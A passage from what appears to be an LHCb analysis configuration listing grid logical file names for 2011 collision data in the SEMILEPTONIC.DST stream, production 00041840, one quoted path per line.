'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017279_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033496_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042172_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031492_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002932_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015531_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012217_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028620_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034631_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067867_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059220_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037124_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013978_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013337_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057105_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047145_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041432_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063320_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055536_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003468_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035829_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031495_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060185_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000140_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035610_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066707_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062924_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045991_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058833_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010975_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004787_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016090_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041676_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007618_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045643_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007717_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006331_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059777_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062765_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068971_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046327_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056448_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055032_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028540_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000084_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030551_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022501_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036627_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000963_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054106_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043156_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036987_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040767_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022458_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049308_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055772_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046470_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032690_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053989_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022683_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044983_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061102_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037221_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030770_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056832_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023889_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063904_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064554_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051477_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034243_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033771_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009231_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041995_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059875_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059705_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003204_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005799_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022459_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021289_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027116_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067036_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051448_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059478_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039891_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041258_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065270_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033149_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035322_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001492_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047398_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003002_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054969_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017855_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060860_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026411_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059366_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027602_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056261_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033102_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035550_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020335_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033678_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042652_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048857_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000994_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020916_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067776_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029285_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062926_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055017_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032712_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062575_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020760_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004383_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024423_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036749_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042719_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067090_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067531_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025343_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055697_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022684_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052164_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012568_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033845_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000182_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002453_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065361_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047273_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029609_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041838_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055415_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001303_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065347_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015117_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000863_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012202_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040672_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003368_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028634_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003509_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059431_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047546_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002313_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037060_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026638_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016556_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028142_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002002_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018346_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062220_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063671_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017397_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021017_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067810_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052322_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036529_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057425_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061409_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051193_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052094_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036332_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059120_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066164_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032241_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046658_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016196_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064015_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063894_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007870_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034708_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051566_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016696_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008196_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052493_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052224_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001257_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038123_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043061_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015017_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046329_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002469_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057996_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063146_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040549_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027878_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028405_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032451_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052156_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045644_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028556_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056480_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040852_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016610_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037409_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014483_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059785_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064961_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042740_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050660_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059655_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011315_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057345_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067665_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056510_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063684_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044359_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040008_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053626_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053067_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056404_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062240_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018788_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040536_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061724_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019455_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065780_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064816_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022838_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047159_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049017_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015553_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046340_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002396_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067091_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048806_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001362_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022187_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054166_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029202_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022685_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060600_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034982_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035918_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025959_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028055_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043023_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066282_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062235_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047144_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034939_1.semileptonic.dst',
